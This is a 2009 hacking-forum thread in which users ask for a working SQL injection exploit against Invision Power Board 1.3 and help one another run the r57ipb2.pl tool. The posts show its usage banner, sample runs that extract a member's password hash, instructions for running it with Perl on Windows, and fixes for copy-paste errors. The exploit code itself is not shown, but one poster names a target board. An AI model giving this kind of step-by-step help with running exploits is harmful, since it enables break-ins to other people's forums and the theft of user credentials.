IT Security and Insecurity Portal |
|
|
IPB 1.3? |
|
Posted: Thu Sep 24, 2009 11:31 am |
|
|
tox1c |
Active user |
|
|
Joined: Sep 22, 2009 |
Posts: 41 |
|
|
|
|
|
|
|
Is there a working, up-to-date SQL injection exploit for IPB v1.3?
I can't seem to find a working one.
I tried the one for 2.3.5 by waraxe but it didn't work. |
|
|
|
|
Posted: Thu Sep 24, 2009 6:33 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Search in threads. I give exploit for IPB 1.3 final |
|
|
|
|
Posted: Thu Sep 24, 2009 9:23 pm |
|
|
tox1c |
Active user |
|
|
Joined: Sep 22, 2009 |
Posts: 41 |
|
|
|
|
|
|
|
I've searched but can't find |
|
|
|
|
Posted: Fri Sep 25, 2009 1:03 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Fri Sep 25, 2009 4:27 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
That's saved as a pl, right? It's executed via Perl. I know that; however, I can't figure out exactly how to use it. Do you have to modify the code according to your needs before executing, or does it prompt you to input the board URL and all that after you execute it?
Thanks. |
|
|
|
|
Posted: Fri Sep 25, 2009 6:02 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
I think this is written in English:
Code: | ## r57ipb2.pl blah.com /ipb13/ 1 0 <-------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1 <----------------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ] |
|
|
|
|
|
|
|
|
|
Posted: Sat Sep 26, 2009 10:13 am |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
Okay, let's say the target board is myass.com/forum/, so I tried by changing that to this
## r57ipb2.pl myass.com /forum/ 1 0 <-------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl myass.com /forum/ 1 1 <----------------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
but after executing it from command.exe I still get this
Code: | Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru |
So I really don't know what I'm doing wrong. That r57ipb2.pl is a file I have to have in order for this script to work? |
|
|
|
|
|
|
|
|
Posted: Sat Sep 26, 2009 3:03 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Save script on the PC. Call it myscript.pl
I think you use Windows
Start--->run-->cmd OK
In command prompt type
myscript.pl myass.com /forum/ 1 0
You need to install Perl on the PC. |
|
|
|
|
Posted: Sat Sep 26, 2009 3:58 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
Thank you. That was a great explanation. I finally got it to work, however it says [failed]. I'm testing it with a 1.2 of my own so it's not patched or anything.
Thank you for your time. |
|
|
|
|
|
|
|
|
Posted: Sun Sep 27, 2009 1:45 am |
|
|
Poison |
Advanced user |
|
|
Joined: Jul 30, 2008 |
Posts: 126 |
|
|
|
|
|
|
|
I get this error when trying to execute the exploit in CMD
C:\Perl>perl hi.pl
Bareword found where operator expected at hi.pl line 44, near ")Sad'password"
(Missing operator before Sad'password?)
String found where operator expected at hi.pl line 48, near "$request = '"
(Might be a runaway multi-line '' string starting on line 44)
(Missing semicolon on previous line?)
Bareword found where operator expected at hi.pl line 48, near "$request = 'http"
(Missing operator before http?)
Number found where operator expected at hi.pl line 60, near "IPB 2."
(Might be a runaway multi-line '' string starting on line 4
(Do you need to predeclare IPB?)
Number found where operator expected at hi.pl line 60, near "IPB 1."
(Do you need to predeclare IPB?)
Bareword found where operator expected at hi.pl line 77, near "print (($target)?
('MEMBER_LOGIN_KEY"
(Might be a runaway multi-line '' string starting on line 60)
(Do you need to predeclare print?)
Bareword found where operator expected at hi.pl line 77, near "')Sad'PASSWORD"
(Missing operator before PASSWORD?)
syntax error at hi.pl line 44, near ")Sad'password"
Can't find string terminator "'" anywhere before EOF at hi.pl line 77. |
|
|
|
|
|
|
|
|
Posted: Sun Sep 27, 2009 11:26 am |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
If you copied it directly from the board, most likely the code is messed up because of the smilies. So try to get the original one or remove the smilies yourself (such as Sad and Cool) and then it will work. |
|
|
|
|
Posted: Mon Sep 28, 2009 10:39 am |
|
|
PJG |
Beginner |
|
|
Joined: Sep 28, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
When I try this it says:
syntax error at C:\scriptname.pl line 38, next char )
"use" not allowed in expression at C:\bruteipb.pl line 38, at end of line
Execution of C:\scriptname.pl aborted due to compilation errors.
It's referring to this line:
use IO::Socket;
What can I do about this? |
|
|
|
|
All times are GMT